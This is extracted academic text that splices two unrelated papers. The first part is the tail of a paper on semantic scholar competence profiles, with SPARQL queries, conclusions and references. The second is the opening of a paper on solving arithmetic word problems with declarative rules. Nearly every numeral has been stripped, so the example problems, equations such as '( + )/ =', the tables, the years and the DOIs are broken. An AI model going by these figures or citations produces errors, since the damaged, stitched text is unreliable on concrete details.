knowledge base with the researchers’ profiles, we can find all topics that a user is competent in. following our knowledge base schema (see ‘design’), we can query all the competence records of a given author uri and find the topics (in form of lod uris), from either the papers’ full-text or exclusively the re zones. in fact, the sparql query shown below is how we gathered each user’s competences (from re zones) to generate the evaluation profiles described in ‘evaluation’: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table example response for finding all competence topics of a user. the ‘extracted competence topics’ column lists the topics as linked entities on the web of lod. the competence topics are sorted by their raw frequency in the user profile, in descending order. user extracted competence topics r dbpedia:tree_(data_structure), dbpedia:vertex_(graph_theory), dbpedia:cluster_analysis, ... r dbpedia:natural_language_processing, dbpedia:semantic_web, dbpedia:entity- relationship_model, ... r dbpedia:recommender_system, dbpedia:semantic_web, dbpedia:web_portal, dbpedia:biodiversity, ... r dbpedia:service_(economics), dbpedia:feedback, dbpedia:user_(computing), dbpedia:system, ... r dbpedia:result, dbpedia:service_discovery, dbpedia:web_search_engine, dbpedia:internet_protocol, ... select distinct ?uri (count(?uri) as ?count) where { ?creator rdf:type um:user . ?creator rdfs:isdefinedby <http://semanticsoftware.info/lodexporter/creator/r > . ?creator um:hascompetencyrecord ?competencerecord . ?competencerecord c:competencefor ?competence . ?competence rdfs:isdefinedby ?uri . ?rhetoricalentity rdf:type sro:rhetoricalelement . ?rhetoricalentity pubo:containsne ?competence . } group by ?uri order by desc(?count) table shows a number of competence topics (grounded to their lod uris) for some of our evaluation participants, sorted in descending order by their frequency in the documents. ranking papers based on a user’s competences semantic user profiles can be incredibly effective in the context of information retrieval systems. here, we demonstrate how they can help to improve the relevance of the results. our proposition is that papers that mention the competence topics of a user are more interesting for her and thus, should be ranked higher in the results. therefore, the diversity and frequency of topics within a paper should be used as ranking features. we showed in sateli & witte ( ) that retrieving papers based on their lod entities is more effective than conventional keyword-based methods. however, the results were not presented in order of their interestingness for the end-user. here, we integrate our semantic user profiles to re-rank the results, based on the common topics in both the papers and a user’s profile: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. select (count(distinct ?uri) as ?rank) where { <http: //example.com/example_paper.xml> pubo:hasannotation ?topic . ? topic rdf:type pubo:linkednamedentity . ? topic rdfs:isdefinedby ?uri . filter exists { ? creator rdfs:isdefinedby <http: // semanticsoftware . info / lodexporter / creator /r > . ? creator um:hascompetencyrecord ?competencerecord . ?competencerecord c:competencefor ?competence . ?competence rdfs:isdefinedby ?uri .} } the query shown above compares the topic uris in a given paper to user r ’s competences extracted from full-text documents and counts the occurrence of such a hit. note that the distinct keyword will cause the query to only count the unique topics, e.g., if <dbpedia:semantic_web> appears two times in the paper, it will be counted as one occurrence. we decided to count the unique occurrences, because a ranking algorithm based on the raw frequency of competence topics will favour long (non-normalized) papers over shorter ones. we can then use the numbers returned by the query above as a means to rank the papers. table shows the result set returned by performing a query against the sepublica dataset of papers from (sateli & witte, ) to find papers mentioning <dbpedia:ontology_(information_science)>. the ‘‘topic mentions’’ column shows the ranked results based on how many times the query topic was mentioned in a document. in contrast, the r and r profile-based columns show the ranked results using the number of common topics between the papers (full-text) and the researchers’ respective profiles (populated from their own publications full-text). note that in the r and r profile-based columns, we only count the number of unique topics and not their frequency. an interesting observation here is that the paper ranked fourth in the frequency-based column ranks last in both profile-based result sets. a manual inspection of the paper revealed that this document, although originally ranked high in the results, is in fact an editors’ note in the preface of the sepublica proceedings. on the other hand, the paper which ranked first in the frequency-based column, remained first in r ’s result set, since this user has a stronger research focus on ontologies and linked open data compared to r , as we observed from their generated profiles during evaluation. finding users with related competences given the semantic user profiles and a topic in form of an lod uri, we can find all users in the knowledge base that have related competences. by virtue of traversing the lod cloud, we can find topic uris that are (semantically) related to a given competence topic and match against users’ profiles to find competent authors: sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table personalized re-ranking of search results: this tables shown how integration of semantic user profiles for researchers r and r affects ranking of the top- results originally retrieved and sorted by a frequency-based method. paper title topic mentions r ’s profile r ’s profile rank raw frequency rank com. topics rank com. topics ‘‘a review of ontologies for describing scholarly and scientific documents’’ ‘‘baudenkmalnetz—creating a semantically annotated web resource of historical buildings’’ ‘‘describing bibliographic references’’ in rdf ‘‘semantic publishing of knowledge about amino acids’’ ‘‘supporting information sharing for re-use and analysis of scientific research publication data’’ ‘‘linked data for the natural sciences: two use cases in chemistry and biology’’ ‘‘ornithology based on linking bird observations with weather data’’ ‘‘systematic reviews as an interface to the web of (trial) data: using pico as an ontology for knowledge synthesis in evidence-based healthcare research’’ ‘‘towards the automatic identification of the nature of citations’’ ‘‘smart research using linked data—sharing research data for integrated water resources management in the lower jordan valley’’ prefix dcterms: <http: // purl .org/dc/terms/> prefix dbpedia: <http: //dbpedia.org/ resource /> select ?author_uri where { service <http://dbpedia.org/ sparql> { dbpedia:ontology_(information_science ) dcterms:subject ? category . ? subject dcterms:subject ? category . } ?author rdf:type um:user . ? creator rdfs:isdefinedby ?author_uri . ? creator um:hascompetencyrecord ?competencerecord. ?competencerecord c:competencefor ?competence. ?competence rdfs:isdefinedby ? subject . ? rhetoricalentity pubo:containsne ?competence. ? rhetoricalentity rdf:type sro:rhetoricalelement . } the query above first performs a federated query against dbpedia’s sparql endpoint to find topic uris that are semantically related to the query topic (we assume all topics under the same category in the dbpedia ontology are semantically related). then, it matches the retrieved uris against the topics of the knowledge base users’ sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table by virtue of traversing the web of lod, topics semantically-related to the query are inferred and their respective competent researchers are shown in the ‘competent users’ column. competence topic competent users dbpedia:ontology_(information_science) r , r , r , r dbpedia:linked_data r , r , r dbpedia:knowledge_representation_and_reasoning r , r , r , r dbpedia:semantic_web r , r , r , r , r , r , r , r dbpedia:controller_vocabulary r , r , r dbpedia:tree_(data_structure) r , r , r competence records. as shown in table , with this approach we can find a researcher competent in <dbpedia:ontology_(information_science)>, even when this topic is not mentioned directly in her profile, but only has <dbpedia:linked_data>, since both of the aforementioned topics are related in the dbpedia ontology. in other words, if we are looking for persons competent in ontologies, a researcher that has previously conducted research on linked data might also be a suitable match. conclusions we presented semantic user profiles as the next important extension for semantic publishing applications: with a standardized, shareable, and extendable representation of a user’s competences, a number of novel application scenarios now becomes possible. for example, searching for scientists with specific competences can help to find reviewers for a given paper or proposal. recommendation algorithms can filter and rank the immense amount of research objects, based on the profile of an individual user. a wealth of additional applications becomes feasible, such as matching the competences of a research group against project requirements, simply by virtue of analyzing an inter-linked knowledge graph of users, datasets, publications, and other artifacts. we showed how these ideas can be realized with semantic scholarly profiles that are based on a linked open data-compliant format. to enable the next generation of scholarly applications, we developed a method for the automatic construction of open knowledge bases with semantic user profiles. our method is implemented in form of the open source scholarlens library, which can be easily integrated into existing or new scholarly systems. an important part of our work is the automatic generation of the user profiles through a text mining pipeline, which helps to overcome the well-known cold start problem in user profiling. unlike other existing approaches, scholarlens populates a knowledge base compliant with the web of linked data, which facilitates connecting the semantic user profiles with other domain- and application-specific information. we demonstrated how such a knowledge base can be exploited for various use cases, using standard sparql queries. based on the results of two rounds of user studies, we can conclude that the generated profiles represent the competences of scientists with a very high accuracy. evaluating the impact of these profiles on different, concrete tasks is the next logical step in this research. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. towards this end, we are currently integrating our profile knowledge base into a scholarly data portal for biodiversity research, in order to evaluate their impact on concrete research questions in a life sciences scenario. additional information and declarations funding this work was partially funded by an nserc discovery grant. this work was also supported by the daad (german academic exchange service) through the ppp canada program and by the dfg (german research foundation) within the gfbio project. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. competing interests the authors declare there are no competing interests. author contributions • bahar sateli, felicitas löffler and rené witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • birgitta könig-ries conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: semantic software: http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements. github: https://github.com/semanticsoftwarelab/scholarlens. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abel f, gao q, houben g-j, tao k. . analyzing user modeling on twitter for per- sonalized news recommendations. in: proceedings of the th international conference on user modeling, adaption, and personalization, umap’ . berlin: springer-verlag, – . balog k, de rijke m. . determining expert profiles (with an application to expert finding). in: proceedings of the th international joint conference on artificial intelligence, ijcai’ . san francisco: morgan kaufmann publishers inc., – . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements https://github.com/semanticsoftwarelab/scholarlens http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. balog k, fang y, de rijke m, serdyukov p, si l. . expertise retrieval. foundation and trends in information retrieval ( – ): – doi . / . berners-lee t, hendler j. . publishing on the semantic web. nature : – doi . / . blei dm, ng ay, jordan mi. . latent dirichlet allocation. the journal of machine learning research : – . bordea g, buitelaar p. a. deriunlp: a context based approach to automatic keyphrase extraction. in: proceedings of the th international workshop on semantic evaluation, semeval ’ . stroudsburg: association for computational linguistics, – . bordea g, buitelaar p. b. expertise mining. in: proceedings of the st national conference on artificial intelligence and cognitive science. galway. bordea g, kirrane s, buitelaar p, pereira bo. . expertise mining for enterprise content management. in: calzolari n, choukri k, declerck t, doǧan mu, maegaard b, mariani j, moreno a, odijk j, piperidis s, eds. proceedings of the eight interna- tional conference on language resources and evaluation (lrec’ ). istanbul, turkey: european language resources association (elra), – . börner k, conlon m, corson-rikert j, ding y. . vivo: a semantic approach to scholarly networking and discovery. in: synthesis lectures on the semantic web. san rafael: morgan & claypool publishers. bostandjiev s, o’donovan j, höllerer t. . linkedvis: exploring social and semantic career recommendations. in: proceedings of the international conference on intelligent user interfaces (iui ’ ). new york: acm, – . brusilovsky p, millán e. . user models for adaptive hypermedia and adaptive educational systems. in: brusilovsky p, kobsa a, nejdl w, eds. the adaptive web. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . buckley c, voorhees em. . retrieval evaluation with incomplete information. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – doi . / . . buitelaar p, eigner t. . topic extraction from scientific literature for competency management. in: the th international semantic web conference. karlsruhe. cantador i, castells p. . extracting multilayered communities of interest from semantic user profiles: application to group modeling and hybrid recommendations. computers in human behavior ( ): – doi . /j.chb. . . . celma o. . foafing the music: bridging the semantic gap in music recommendation. in: proceedings of the th international conference on the semantic web (iswc’ ). berlin: springer-verlag, – doi . / _ . cortis k, scerri s, rivera i, handschuh s. . an ontology-based technique for online profile resolution. in: jatowt a, lim ep, ding y, miura a, tezuka t, dias g, tanaka k, flanagin a, dai b, eds. proceedings of the th international conference on social informatics (socinfo ). lecture notes in computer science, vol. . new york: springer-verlag, – . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / _ http://dx.doi.org/ . /peerj-cs. croft b, metzler d, strohman t. . search engines: information retrieval in practice. st edition. usa: addison-wesley publishing company. cunningham h, maynard d, bontcheva k, tablan v, aswani n, roberts i, gorrell g, funk a, roberts a, damljanovic d, heitz t, greenwood ma, saggion h, petrak j, li y, peters w. . text processing with gate (version ). university of sheffield, department of computer science. daiber j, jakob m, hokamp c, mendes pn. . improving efficiency and accuracy in multilingual entity extraction. in: proc. of the th international conference on semantic systems (i-semantics). draganidis f, mentzas g. . competency based management: a review of systems and approaches. information management and computer security ( ): – doi . / . fazel-zarandi m, fox m. . an ontology for skills and competency management. in: proceedings of the th international conference on formal ontologies in information systems (fois ). graz, austria. gauch s, speretta m, chandramouli a, micarelli a. . user profiles for personalized information access. in: brusilovsky p, kobsa a, nejdl w, eds. the adaptive web. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . golemati m, katifori a, vassilakis c, lepouras g, halatsis c. . creating an ontology for the user profile: method and applications. in: proceedings of the first international conference on research challenges in information science (rcis). gonzalez j, stumme g. . semantic methods and tools for information portals— the semiport project. in: semantic web mining. proc. of the semantic web mining workshop of the th europ. conf. on machine learning (ecml’ )/ th europ. conf. on principles and practice of knowledge discovery in databases (pkdd’ ). helsinki, august , . haase p, schnizler b, broekstra j, ehrig m, van harmelen f, menken m, mika p, plechawski m, pyszlak p, siebes r, staab s, tempich c. . bibster—a semantics-based bibliographic peer-to-peer system. berlin, heidelberg: springer, – . heath t, bizer c. . linked data: evolving the web into a global data space. in: synthesis lectures on the semantic web: theory and technology. san rafael: morgan & claypool publishers. heckmann d, schwartz t, brandherm b, schmitz m, von wilamowitz-moellendorff m. . gumo—the general user model ontology. in: user modeling . lecture notes in computer science, vol. . berlin: springer, – . hr-xml-consortium. . competencies (measurable characteristics). available at http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html. järvelin k, kekäläinen j. . cumulated gain-based evaluation of ir techniques. acm trans. inf. syst. ( ): – doi . / . . jovanovic j, siadaty m, gasevic d, milikic n. . intelleo competences ontology. available at http://www.intelleo.eu/ontologies/competences/spec/ . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html http://dx.doi.org/ . / . http://www.intelleo.eu/ontologies/competences/spec/ http://dx.doi.org/ . /peerj-cs. kobsa a. . generic user modeling systems. user modeling and user-adapted interaction ( – ): – doi . /a: . kyriacou d, davis hc, tiropanis t. . a (multi’domain’sional) scrutable user modelling infrastructure for enriching lifelong user modelling. in: lifelong user modelling workshop (in conjunction with conference umap ). trento,. letierce j, passant a, decker j, breslin g. . understanding how twitter is used to spread scientific messages. in: web science conf. raleigh. likert r. . a technique for the measurement of attitudes. archives of psychology ( ): – . manning cd, raghavan p, schütze h. . introduction to information retrieval. cambridge: cambridge university press. mendes pn, jakob m, garcía-silva a, bizer c. . dbpedia spotlight: shedding light on the web of documents. in: proceedings of the th international conference on semantic systems. acm, – . nishioka c, scherp a. . profiling vs. time vs. content: what does matter for top-k publication recommendation based on twitter profiles? in: proceedings of the th acm/ieee-cs on joint conference on digital libraries, jcdl ’ . new york: acm, – doi . / . . nist. . text retrieval conference (trec): enterprise track. available at http://trec. nist.gov/data/enterprise.html. orlandi f, breslin j, passant a. . aggregated, interoperable and multi-domain user profiles for the social web. in: proceedings of the th international conference on semantic systems (i-semantics ’ ). new york: acm, – . paquette g. . instructional engineering for network-based learning. available at http://www-clips.imag.fr/calie /actes/paquette.pdf . paquette g. . an ontology and a software framework for competency modeling and management. educational technology & society ( ): – . raad e, chbeir r, dipanda a. . user profile matching in social networks. in: the th international conference on network-based information system. sampson d, fytros d. . competence models in technology-enhanced competence- based learning. in: adelsberger hh, kinshuk, pawlowski jm, sampson dg, eds. handbook on information technologies for education and training. berlin, heidelberg: springer, – . sandberg r. . competence—the basis for a smart workforce. in: gerber r, lanks- hear c, eds. training for a smart workforce. london: routledge. sateli b, löffler f, könig-ries b, witte r. . semantic user profiles: learning scholars’ competences by analyzing their publications. in: semantics, analytics, visualisation: enhancing scholarly data (save-sd ). springer. sateli b, witte r. . semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud. peerj computer science (e ): doi . /peerj-cs. . schmidt a, kunzmann c. . towards a human resource development ontology for combining competence management and technology-enhanced workplace learning. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /a: http://dx.doi.org/ . / . http://trec.nist.gov/data/enterprise.html http://trec.nist.gov/data/enterprise.html http://www-clips.imag.fr/calie /actes/paquette.pdf http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. in: proceedings of the international conference on on the move to meaningful internet systems: awesome, cams, cominf, is, ksinbit, mios-ciao, monet– volume part ii, otm’ . berlin: springer-verlag, – doi . / _ . shadbolt n, hall w, berners-lee t. . the semantic web revisited. intelligent systems, ieee ( ): – doi . /mis. . . shotton d. . semantic publishing: the coming revolution in scientific journal publishing. learned publishing ( ): – doi . / . sicilia m-a. . intelligent learning infrastructure for knowledge intensive organiza- tions: a semantic web perspective. in: chapter ontology-based competency manage- ment: infrastructures for the knowledge intensive learning organization. hershey: idea group, – . sieg a, mobasher b, burke r. . web search personalization with ontological user profiles. in: proceedings of the th acm conference on conference on information and knowledge management, (cikm ’ ). new york: acm, – . sitthisak o, gilbert l, davis hc. . transforming a competency model to pa- rameterised questions in assessment. in: cordeiro j, hammoudi s, filipe j, eds. web information systems and technologies: th international conference, webist , funchal, madeira, portugal, may - , , revised selected papers. berlin, heidelberg: springer, – doi . / - - - - _ . stankovic m, rowe m, laublet p. . finding co-solvers on twitter, with a lit- tle help from linked data. in: proceedings of the th international conference on the semantic web: research and applications. berlin: springer-verlag, – doi . / - - - - _ . szomszor m, alani h, cantador i, o’hara k, shadbolt n. . semantic modelling of user interests based on cross-folksonomy analysis. in: proceedings of the th international conference on the semantic web, iswc ’ . berlin, heidelberg: springer- verlag, – doi . / - - - - _ . tang j, yao l, zhang d, zhang j. . a combination approach to web user profiling. acm transactions on knowledge discovery from data (tkdd) ( ): : – : doi . / . . teodorescu t. . competence versus competency: what is the difference? performance improvement ( ): – . zukerman i, litman d. . natural language processing and user modeling: synergies and limitations. user modeling and user-adapted interaction ( – ): – doi . /a: . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / _ http://dx.doi.org/ . /mis. . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. mapping to declarative knowledge for word problem solving subhro roy∗ massachusetts institute of technology subhro@csail.mit.edu dan roth∗ university of pennsylvania danroth@seas.upenn.edu abstract math word problems form a natural abstrac- tion to a range of quantitative reasoning prob- lems, such as understanding financial news, sports results, and casualties of war. solving such problems requires the understanding of several mathematical concepts such as dimen- sional analysis, subset relationships, etc. in this paper, we develop declarative rules which govern the translation of natural language de- scription of these concepts to math expres- sions. we then present a framework for in- corporating such declarative knowledge into word problem solving. our method learns to map arithmetic word problem text to math ex- pressions, by learning to select the relevant declarative knowledge for each operation of the solution expression. this provides a way to handle multiple concepts in the same prob- lem while, at the same time, supporting in- terpretability of the answer expression. our method models the mapping to declarative knowledge as a latent variable, thus remov- ing the need for expensive annotations. exper- imental evaluation suggests that our domain knowledge based solver outperforms all other systems, and that it generalizes better in the realistic case where the training data it is ex- posed to is biased in a different way than the test data. introduction many natural language understanding situations re- quire reasoning with respect to numbers or quanti- ∗most of the work was done when the authors were at the university of illinois, urbana champaign. ties – understanding financial news, sports results, or the number of casualties in a bombing. math word problems form a natural abstraction to a lot of these quantitative reasoning problems. conse- quently, there has been a growing interest in devel- oping automated methods to solve math word prob- lems (kushman et al., ; hosseini et al., ; roy and roth, ). arithmetic word problem mrs. hilt baked pies last weekend for a holiday din- ner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? solution ( + )/ = math concept needed for each operation figure : an example arithmetic word problem and its solution, along with the concepts required to generate each operation of the solution understanding and solving math word problems involves interpreting the natural language descrip- tion of mathematical concepts, as well as under- standing their interaction with the physical world. consider the elementary school level arithmetic word problem shown in fig . to solve the prob- lem, one needs to understand that “apple pies” and “pecan pies” are kinds of “pies”, and hence, the transactions of the association for computational linguistics, vol. , pp. – , . action editor: luke zettlemoyer. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. number of apple pies and pecan pies needs to be summed up to get the total number of pies. simi- larly, detecting that “ ” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by to get the answer. besides part-whole relationship and dimensional analysis, there are several other con- cepts that are needed to support reasoning in math word problems. some of these involve understand- ing comparisons, transactions, and the application of math or physics formulas. most of this knowledge can be encoded as declarative rules, as illustrated in this paper. this paper introduces a framework for incorpo- rating this “declarative knowledge” into word prob- lem solving. we focus on arithmetic word prob- lems, whose solution can be obtained by combin- ing the numbers in the problem with basic opera- tions (addition, subtraction, multiplication or divi- sion). for combining a pair of numbers or math sub- expressions, our method first predicts the math con- cept that is needed for it (e.g., subset relationship, di- mensional analysis, etc.), and then predicts a declar- ative rule under that concept to infer the mathemati- cal operation. we model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps. the proposed approach has some clear advan- tages compared to existing work on word problem solving. first, it provides interpretability of the so- lution, without expensive annotations. our method selects a declarative knowledge based inference rule for each operation needed in the solution. these rules provide an explanation for the operations per- formed. in particular, it learns to select relevant rules without explicit annotations for them. second, each individual operation in the solution expression can be generated independently by a separate mathemat- ical concept. this allows our method to handle mul- tiple concepts in the same problem. we show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. our method, on the other hand, learns the right abstractions even in the presence of biases in the data. we also introduce a novel approach to gather word problems without these biases, creating a new dataset of problems. the next section discusses related work. we next introduce the mathematical concepts required for arithmetic word problems, as well as the declara- tive rules for each concept. section describes our model – how we predict answers using declarative knowledge – and provides the details of our train- ing paradigm. finally, we provide an experimental evaluation of our proposed method in section , and then conclude with a discussion of future work. related work our work is primarily related to three major strands of research - automatic word problem solving, se- mantic parsing, and approaches incorporating back- ground knowledge in learning. . automatic word problem solving there has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. these can be broadly categorized into two types: arithmetic and algebra. arithmetic word problems arithmetic problems involve combining numbers with basic operations (addition, subtraction, multiplication and division), and are generally directed towards elementary school students. roy and roth ( ), roy and roth ( ) and this work focus on this class of word problems. the works of hosseini et al. ( ) and mitra and baral ( ) focus on arithmetic prob- lems involving only addition and subtraction. some of these approaches also try to incorporate some form of declarative or domain knowledge. hosseini et al. ( ) incorporates the transfer phenomenon by classifying verbs; mitra and baral ( ) maps problems to a set of formulas. both require exten- sive annotations for intermediate steps (verb classi- fication for hosseini et al. ( ), alignment of num- bers to formulas for mitra and baral ( ), etc). in contrast, our method can handle a more general class of problems, while training only requires problem- equation pairs coupled with rate component anno- tations. roy and roth ( ) focuses only on us- ing dimensional analysis knowledge, and handles the same class of problems as we do. in contrast, our method provides a framework for including any form of declarative knowledge, exemplified here by incorporating common concepts required for arith- metic problems. algebra word problems algebra word problems are characterized by the use of (one or more) variables in contructing (one or more) equations. these are typically middle or high school problems. koncel-kedziorski et al. ( ) looks at single equa- tion problems, and shi et al. ( ) focuses on num- ber word problems. kushman et al. ( ) intro- duces a template based approach to handle general algebra word problems and several works have later proposed improvements over this approach (zhou et al., ; upadhyay et al., ; huang et al., ). there has also been work on generating ra- tionale for word problem solving (ling et al., ). more recently, some focus turned to pre-university exam questions (matsuzaki et al., ; hopkins et al., ), which requires handling a wider range of problems and often more complex semantics. . semantic parsing our work is also related to learning semantic parsers from indirect supervision (clarke et al., ; liang et al., ). the general approach here is to learn a mapping of sentences to logical forms, with the only supervision being the response of executing the log- ical form on a knowledge base. similarly, we learn to select declarative rules from supervision that only includes the final operation (and not which rule gen- erated it). however, in contrast to the semantic pars- ing work, in our case the selection of each declar- ative rule usually requires reasoning across multi- ple sentences. further, we do not require an explicit grounding of words or phrases to logical variables. . background knowledge in learning approaches to incorporate knowledge in learning started with explanation based learning (ebl) (dejong, ; dejong, ). ebl uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our declara- tive knowledge. more recent approaches tried to in- corporate knowledge in the form of constraints or expectations from the output (roth and yih, ; chang et al., ; chang et al., ; ganchev et al., ; smith and eisner, ; naseem et al., ; bisk and hockenmaier, ; gimpel and bansal, ). finally, we note that there has been some work in the context of question answering on perturbing questions or answers as a way to test or assure the robustness, or lack of, the approach (khashabi et al., ; jia and liang, ). we make use of similar ideas in order to generate an unbiased test set for math word problems (sec. ). knowledge representation here, we introduce our representation of domain knowledge. we organize the knowledge hierarchi- cally in two levels – concepts and declarative rules. a math concept is a phenomenon which needs to be understood to apply reasoning over quantities. ex- amples of concepts include part-whole relations, di- mensional analysis, etc. under each concept, there are a few declarative rules, which dictate which op- eration is needed in a particular context. an exam- ple of a declarative rule under the part-whole con- cept can be that “if two numbers quantify “parts” of a larger quantity, the operation between them must be addition”. these rules use concept specific pred- icates, which we exemplify in the following subsec- tions. since this work focuses on arithmetic word prob- lems, we consider math concepts which are most common in these problems, as follows: . transfer: this involves understanding the transfer of objects from one person to another. for example, the action described by the sen- tence “tim gave apples to jim”, results in tim losing “ apples” and jim gaining “ apples”. . dimensional analysis: this involves under- standing compatibility of units or dimensions. for example, “ pies” can be divided by “ pies per row” to get the number of rows. . part-whole relation: this includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. for example, the problem in section involves understand- ing “pecan pies” and “apple pies” are parts of “pies”, and hence must be added. . explicit math: word problems often mention explicit math relationships among quantities or entities in the problem. for example, “jim is inches taller than tim”. this concept captures the reasoning needed for such relationships. each of these concepts comprises a small number of declarative rules which determine the math oper- ations; we describe them below. . transfer consider the following excerpt of a word problem exhibiting a transfer phenomenon: “stephen owns books. daniel gave him books.” the goal of the declarative rules is to determine which operation is required between and , given that we know that a transfer is taking place. we note that a transfer usu- ally involves two entities, which occurs as subject and indirect object in a sentence. the direction of transfer is determined by the verbs associated with the entities. we define a set of variables to denote these properties; we define as subj , verb , iobj the subject, verb and indirect object associated with the first number, and as subj , verb , iobj the sub- ject, verb and indirect object related to the second number. for the above example, the assignment of the variables are shown below: [stephen]subj [owns]v erb books. [daniel]subj [gave]v erb [him]iobj books. in order to determine the direction of the transfer, we require some classification of verbs. in partic- ular, we classify each verb into one of five classes: have, get, give, construct and destroy. the have class consists of all verbs which sig- nify the state of an entity, such as “have”, “own”, etc. the get class contains verbs which indicate the gaining of things for the subject. examples of such verbs are “acquire”, “borrow”, etc. the give class contains verbs which indicate the loss of things for the subject. verbs like “lend”, “give” belong to this class. finally construct class consti- tutes verbs indicating construction or creation, like “build”, “fill”, etc., while destroy verbs indi- cate destruction related verbs like “destroy”, “eat”, “use”, etc. this verb classification is largely based on the work of hosseini et al. ( ). finally, the declarative rules for this concept have the following form: [verb ∈ have] ∧ [verb ∈ give] ∧ [coref(subj , iobj )] ⇒ addition where coref(a,b) is true when a and b repre- sent the same entity or are coreferent, and is false otherwise. in the examples above, verb is “own” and hence [verb ∈ have] is true. verb is “give” and hence [verb ∈ give] is true. fi- nally, subj and iobj both refer to stephen, so [coref(subj , iobj )] returns true. as a result, the above declarative rule dictates that addition should be performed between and . we have such inference rules for transfer, cov- ering all combinations of verb classes and coref() values. all these rules generate addition or subtrac- tion operations. . dimensional analysis we now look at the use of dimensional analysis knowledge in word problem solving. to use di- mensional analysis, one needs to extract the units of numbers as well as the relations between the units. consider the following excerpt of a word problem: “stephen has bags. each bag has apples. know- ing that the unit of is “bag” and the effective unit of is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. to capture these dependencies, we first introduce a few terms. whenever a number has a unit of the form “a per b”, we refer to “a” as the unit of the number, and refer to “b” as the rate component of the number. in our example, the unit of is “apple”, and the rate component of is “bag”. we define variables unit and rate to denote the unit and the rate component of the first number respectively. we similarly define unit and rate . for the above ex- ample, the assignment of variables is shown below: stephen has [bags]unit . each [bag]rate has [apples]unit . finally, the declarative rule applicable for our exam- ple has the following form: [coref(unit , rate )] ⇒ multiplication we only have rules for dimensional analysis. they generate multiplication or division operations. . explicit math in this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in: “stephen has apples. daniel has more apples than stephen”. we define math and math by any explicit math term associated with the first and second numbers respectively. as was the case for transfers, we also define subj , iobj , subj , and iobj to denote the entities participating in the math relationship. the assignment of these variables in our example is: [stephen]subj has apples. [daniel]subj has [more apples than]math [stephen]iobj . we classify explicit math terms into one of three classes - add, sub and mul. add comprises terms for addition, like “more than”, “taller than” and “heavier than”. sub consists of terms for sub- traction like“less than”, “shorter than”, etc., and mul contains terms indicating multiplication, like “times”, “twice” and “thrice”. finally, the declara- tive rule that applies for our example is: [coref(subj , iobj )] ∧ [math ∈ add] ⇒ addition. we have only rules for explicit math. . part-whole relation understanding part-whole relationships entails un- derstanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). for example, in the excerpt “mrs. hilt has pecan pies and apple pies”, de- termining that pecan pies and apple pies are parts of all pies, helps infer that addition is needed. we have simple rules which directly map from hyponym, hypernym or sibling detection to the corresponding math operation. for the above example, the applica- ble declarative rule is: [sibling(number , number )] ⇒ addition the rules for the part-whole concept can generate addition and subtraction operations. table gives a list of all the declarative rules. note that all the declarative rules are designed to determine an op- eration between two numbers only. we introduce a strategy in section , which facilitates combining sub-expressions with these rules. mapping of word problems to declarative knowledge given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. in order to derive the expres- sion y from the word problem x, we leverage math concepts and declarative rules that we introduced in section . in order to combine two numbers men- tioned in x, we first predict a concept k, and then we choose a declarative knowledge rule r from k. the rule r generates the math operation needed to com- bine the two numbers. consider the first example in table . to combine and , we first decide on the 